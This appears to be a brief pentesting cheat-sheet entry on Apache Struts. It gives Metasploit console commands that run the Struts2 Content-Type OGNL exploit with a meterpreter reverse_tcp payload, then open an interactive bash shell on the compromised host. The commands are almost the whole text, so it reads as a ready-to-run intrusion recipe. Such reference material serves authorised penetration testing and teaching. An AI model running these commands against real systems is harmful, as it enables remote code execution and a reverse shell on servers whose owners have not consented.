# Apache Struts Pentesting An open-source web application framework for developing Java EE web applications. ### Struts2 OGNL Elavasion Metasploit is useful for exploiting. ``` msfconsole msf > use multi/http/struts2_content_type_ognl msf > set payload linux/x86/meterpreter/reverse_tcp msf > exploit meterpreter > shell SHELL=/bin/bash script -q /dev/null ```